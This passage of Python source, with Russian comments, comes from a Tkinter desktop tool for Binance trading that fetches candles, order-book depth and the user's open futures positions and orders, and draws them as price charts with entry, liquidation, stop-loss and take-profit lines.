myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='30m', limit=288)) #tupl
elif GS=='CANDLE 1h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1h', limit=288)) #tupl
elif GS=='CANDLE 4h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='4h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='4h', limit=288)) #tupl
elif GS=='CANDLE 1d':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1d', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1d', limit=288)) #tupl
my_file_Kl = open(grSmb + "_KL.txt", "w")
my_file_Kl.write(str(myTupFtK))
my_file_Kl.close()
#print(myTup12)
myDicGr1 = myTupFtK[1]
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
if i==0:
PnL_Pos_L = ''
PnL_Pos_S = ''
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
PnL_Pos = 0
app.graph_Cn.delete("all")
app.graph_VV.delete("all")
app.graph_BTCD.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
#print(grZm)
#print (grMd)
TT0 = time.mktime(time.localtime())*1000
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
GAP = app.graph_Cn.create_line(points,fill="blue",width=1,dash=(4,2))
if MS == 'FUTURES':
GPEP_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1,dash=(20,10))
GPEP_S = app.graph_Cn.create_line((0,0,0,0),fill="black",width=1,dash=(20,10))
GPLP = app.graph_Cn.create_line((0,0,0,0),fill="orange",width=3,dash=(20,10))
GPSP = app.graph_Cn.create_line((0,0,0,0),fill="red",width=3,dash=(20,10))
GPPP = app.graph_Cn.create_line((0,0,0,0),fill="green",width=3,dash=(20,10))
GPPP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#66CDAA",width=1,dash=(50,50))
GPSP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1,dash=(50,50))
GEPt = app.graph_Cn.create_text(0,0,text='',fill="black",font=grFt_12)
GOS_TP = app.graph_Cn.create_rectangle((0,0,0,0),fill="#66CDAA")
GOS_SL = app.graph_Cn.create_rectangle((0,0,0,0),fill="pink")
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue",font=grFt_10)
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue",font=grFt_10)
elif prSt < 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue",font=grFt_10)
yp=1180
ypi=0
while yp > -500:
points=[]
if GS=='CANDLE 5m':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1m':
yp_s = 10*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 15m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 30m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 4h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1d':
yp_s = 14*4
yp = 1180 - ypi*yp_s
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
if GS=='CANDLE 5m':
tm=TT0/1000+36000-ypi*3600
elif GS=='CANDLE 1m':
tm=TT0/1000+7200-ypi*600
elif GS=='CANDLE 15m':
tm=TT0/1000+108000-ypi*7200
elif GS=='CANDLE 30m':
tm=TT0/1000+216000-ypi*14400
elif GS=='CANDLE 1h':
tm=TT0/1000+432000-ypi*43200
elif GS=='CANDLE 4h':
tm=TT0/1000+1728000-ypi*172800
elif GS=='CANDLE 1d':
tm=TT0/1000+10368000-ypi*1209600
tm1 = datetime.datetime.fromtimestamp(tm)
if GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h':
tmm=tm1.strftime("%H:%M")
elif GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
tmm=tm1.strftime("%d.%m")
app.graph_Tb.create_text(1180 - ypi*yp_s,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*yp_s,10,text=tmm)
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1)):
myDicGr1TT = myDicGr1[mm]
myDicGr1BTCD = myDicBTCD[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
if GS=='CANDLE 5m':
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*4
elif GS=='CANDLE 1m':
xxp = 700 + ((((xx - TT0)/1000)+30)/60)*4
elif GS=='CANDLE 15m':
xxp = 700 + ((((xx - TT0)/1000)+450)/900)*4
elif GS=='CANDLE 30m':
xxp = 700 + ((((xx - TT0)/1000)+900)/1800)*4
elif GS=='CANDLE 1h':
xxp = 700 + ((((xx - TT0)/1000)+1800)/3600)*4
elif GS=='CANDLE 4h':
xxp = 700 + ((((xx - TT0)/1000)+7200)/14400)*4
elif GS=='CANDLE 1d':
xxp = 700 + ((((xx - TT0)/1000)+43200)/86400)*4
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
if mm == 0:
yypVMax = 0
yypTMax = 0
for nm in range(len(myDicGr1)):
if float(myDicGr1[nm][5])>yypVMax:
#print(myDicGr1[nm][5])
yypVMax = float(myDicGr1[nm][5])
if float(myDicGr1[nm][8])>yypTMax:
#print(myDicGr1[nm][5])
yypTMax = float(myDicGr1[nm][8])
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
app.graph_BTCD.create_line(-100,50,1000,50,fill='black',dash=(1,1))
else:
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
if float(myDicGr1BTCD[1]) < float(myDicGr1BTCD[4]):
app.graph_BTCD.create_line(xxp,50,xxp,50-((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='green')
else:
app.graph_BTCD.create_line(xxp,50,xxp,50+((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='red')
if xxp > 1000:
app.graph_Cn.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Cn.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
app.graph_VV.create_line(xxp,100,xxp,yyp5,fill=flc)
app.graph_VV.create_line(xxp+1,0,xxp+1,yyp6,fill='black')
if MS == 'FUTURES':
BnFAcc=bot.userPositionInfo()
if len(BnFAcc)>0: #and i==0:
sTmp=''
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if str(BnFAcc1['symbol'])==grSmb and float(BnFAcc1['positionAmt']) != 0:
y_liq = float(BnFAcc1['liquidationPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPLP, -500,y_liq,800,y_liq)
y_liq = float(BnFAcc1['entryPrice'])
PEP=float(BnFAcc1['entryPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
#print (BnFAcc1['positionSide'])
if str(BnFAcc1['positionSide'])=='LONG':
app.graph_Cn.coords(GPEP_L, -500,y_liq,800,y_liq)
PnL_Pos_L = BnFAcc1['unRealizedProfit']
if str(BnFAcc1['positionSide'])=='SHORT':
#print (BnFAcc1['positionSide'])
app.graph_Cn.coords(GPEP_S, -500,y_liq,800,y_liq)
PnL_Pos_S = BnFAcc1['unRealizedProfit']
app.graph_Cn.coords(GEPt, 105, y_liq)
app.graph_Cn.itemconfigure(GEPt,text=str(BnFAcc1['positionSide']) + ' Price: '+ str(float(BnFAcc1['entryPrice']))+'\n'+'Amt: ' + str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))+ ' USDT')
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPSP, -500,y_liq,800,y_liq)
PSP = float(BnFAcc1['stopPrice'])
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_SL.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_TP.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if y_liq > 1000:
Ltmp = app.graph_Cn.configure()
#print(Ltmp['scrollregion'][4])
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],Ltmp1[1],Ltmp1[2],y_liq+200))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
PPP=y_liq
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_TP.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_SL.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPPP, -500,y_liq,800,y_liq)
if y_liq < -500:
Ltmp = app.graph_Cn.configure()
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],y_liq-200,Ltmp1[2],Ltmp1[3]))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='LIMIT' and str(BnFAcc1['type'])=='LIMIT' and i==0:
#print(BnFAcc1)
y_liq = float(BnFAcc1['price'])
if str(BnFAcc1['positionSide'])== 'LONG':
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.create_line(800,y_liq,900,y_liq,fill="#336633",width=1)
app.graph_Cn.create_text(800,y_liq,text='Order LONG\n'+str(BnFAcc1['price']) ,fill="#336633")
if str(BnFAcc1['positionSide'])== 'SHORT':
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.create_line(800,y_liq,900,y_liq,fill="#DC143C",width=1)
app.graph_Cn.create_text(800,y_liq,text='Order SHORT\n'+str(BnFAcc1['price']) ,fill="#DC143C")
#Order Book Graph
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
#y0 = grMd + grSt/2 - ((float(mylist4[m][0])-yI0)/prSt)* grSt
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if m==0:
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Cn.coords(GAP, -500, y0, 800, y0)
app.graph_Cn.coords(GAPt, 805, y0)
if len(PnL_Pos_L) > 0 and len(PnL_Pos_S) > 0:
sTmp = '\n' + 'Price: ' + str(float(mylist4[m][0]))
else:
sTmp = 'Price: ' + str(float(mylist4[m][0]))
if len(PnL_Pos_L) > 0:
sTmp += '\n'+'Long PnL: ' + str(PnL_Pos_L)
if len(PnL_Pos_S) > 0:
sTmp += '\n'+'Short PnL: ' + str(PnL_Pos_S)
app.graph_Cn.itemconfigure(GAPt,text=sTmp)
class Timer_Candle_Summ:
def __init__(self):
global TE_CndSm
global ss
global yI
global Lo
while True:
if PS1 == True:
sys_msg = ' Свечной график сравнения SPOT/FUTURES' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = True
break
if should_run_S:
for i in range(400):
if not should_run_S:
sys_msg = ' Свечной график сравнения SPOT/FUTURES' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_S:
if i==0:
sys_msg = ' Свечной график сравнения SPOT/FUTURES ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = False
if i > 0:
time.sleep(0.5)
myTup_DSp = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
mylist5_Sp=mylist3_Sp['asks'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=500)) #tupl
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
mylist5_Ft=mylist3_Ft['asks'] #list
#print(myTup11[1])
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#Если один купил а другой продал, то это buy или sell?
#Отвечу так: в истории торгов binance зеленым подсвечиваются сделки, у которых isBuyerMaker == false,
#и маджентой - у кого true
#sss41 = "BNBUSDT - trades"
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI0=float(myDicGr1Sp[287][1])
#print (myDicGr1[1][1])
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI0=float(myDicGr1Ft[287][1])
#print (yI0)
if i==0:
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
app.graph_Sm.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
ss = ""
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
GAP_Sp = app.graph_Sm.create_line(points,fill="blue",width=1,dash=(4,2))
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue")
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue")
elif prSt < 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue")
yp=1180
ypi=0
while yp > -500:
points=[]
yp = 1180 - ypi*12*4#12*4=1hour
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+36000-ypi*3600
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%H:%M")
app.graph_Tb.create_text(1180 - ypi*48,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*48,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1Sp)):
myDicGr1TT = myDicGr1Sp[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#print (len(myDicGr1))
for mm in range(len(myDicGr1Ft)):
myDicGr1TT = myDicGr1Ft[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 696 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "black"
else:
flc="black"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5_Ft))):
if float(mylist5_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5_Ft[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
if float(mylist4_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4_Ft[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
if m==0:
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Sm.coords(GAP_Sp, -500, y0, 800, y0)
app.graph_Sm.itemconfigure(GAP_SpT,text=float(mylist4_Ft[m][0]))
class Timer_BTCUSDT:
def __init__(self):
global TE_BU
while True:
if PS_BU == False:
sys_msg = ' Наблюдатель BTC/USDT остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_BU = True
break
if should_run_BU:
for i in range(400):
if not should_run_BU:
#print('Stopped...')
ss_BU = 'Stopped...' + '\n BTC/USDT watcher'
app.label_BU.config(text = ss_BU)
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
sys_msg = ' Наблюдатель BTC/USDT будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_BU:
if i==0:
sys_msg = ' Наблюдатель BTC/USDT запущен.'
app.Sys_Msg(text1=sys_msg)
TE_BU = False
if i > 0:
time.sleep(0.5)
myTupSpK =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=5)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI_Sp_0=0
yI_Sp_1=0
for ii in range(len(myDicGr1Sp)):
if ii == 0:
yI_Sp_1=float(myDicGr1Sp[ii][3])
if float(myDicGr1Sp[ii][2])>yI_Sp_0:
yI_Sp_0=float(myDicGr1Sp[ii][2]) #High
if float(myDicGr1Sp[ii][2])<yI_Sp_1:
yI_Sp_1=float(myDicGr1Sp[ii][3]) #Low
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=5)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI_Ft_0=0
yI_Ft_1=1
for ii in range(len(myDicGr1Ft)):
if ii == 0:
yI_Ft_1=float(myDicGr1Ft[ii][3])
if float(myDicGr1Ft[ii][2])>yI_Ft_0:
yI_Ft_0=float(myDicGr1Ft[ii][2]) #High
if float(myDicGr1Ft[ii][2])<yI_Ft_1:
yI_Ft_1=float(myDicGr1Ft[ii][3]) #Low
ss_BU = 'SPOT: xx%, FUTURES xx%'
myTup_DSp = ('depth', bot.depth(symbol='BTCUSDT', limit=5)) #tupl
#print('SPOT D',myTup_DSp)
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol='BTCUSDT', limit=5)) #tupl
#print('FT D',myTup_DFt)
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%H:%M:%S] ")
